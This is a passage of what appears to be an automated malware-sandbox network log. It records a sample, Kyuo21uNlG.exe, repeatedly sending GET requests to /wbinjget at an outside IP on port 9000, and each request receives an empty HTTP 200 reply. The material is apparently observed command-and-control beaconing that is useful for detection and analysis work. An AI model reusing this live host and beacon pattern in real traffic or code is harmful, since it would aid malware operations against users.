                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:18.680244923 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:18 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.44973945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:18.954350948 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:39:20.312387943 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:20 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.44974145.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:20.545741081 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:39:21.902472019 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:21 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.44974345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:22.136858940 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:23.522574902 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:23 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.44974445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:23.746901035 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:39:25.153930902 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:24 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.44974745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:25.386769056 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:26.748826027 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:26 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.44974945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:26.985049963 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:39:28.345654964 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:28 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          14192.168.2.44975045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:28.574126005 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:29.977480888 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:29 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          15192.168.2.44975245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:30.221647024 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:39:31.624775887 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:31 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          16192.168.2.44975345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:31.857022047 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:33.222232103 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:33 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          17192.168.2.44975445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:33.451997042 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:34.762172937 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:34 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          18192.168.2.44975545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:34.996382952 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:36.980937004 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:36 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          19192.168.2.44975645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:37.215121984 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:38.618941069 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:37 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          20192.168.2.44975745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:38.855731010 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:40.258306980 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:39 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          21192.168.2.44975845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:40.480930090 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:39:41.837119102 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:40 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          22192.168.2.44975945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:42.060399055 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:43.414844990 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:43 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          23192.168.2.44976045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:43.636677027 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:44.994009972 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:44 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          24192.168.2.44976145.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:45.230479956 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:39:46.585952044 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:45 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          25192.168.2.44976245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:46.808500051 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:48.170269012 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:47 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          26192.168.2.44976345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:48.402468920 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:49.947385073 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:49 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          27192.168.2.44976445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:50.185225010 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:51.495055914 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:50 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          28192.168.2.44976545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:51.731306076 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:39:53.041482925 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:52 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          29192.168.2.44976645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:53.278134108 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:39:54.680469036 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:54 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          30192.168.2.44976745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:54.902507067 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:56.306618929 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:55 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          31192.168.2.44976845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:56.543081045 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:57.856776953 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:57 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          32192.168.2.44976945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:58.089998007 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:07.209204912 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:01 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          33192.168.2.44978345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:07.435596943 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:08.838670969 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:07 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          34192.168.2.44978745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:09.075268030 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:10.525937080 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:09 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          35192.168.2.44979345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:10.766207933 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:12.122873068 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:11 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          36192.168.2.44979845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:12.355925083 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:13.712222099 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:13 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          37192.168.2.44980045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:13.934746027 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:15.290476084 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
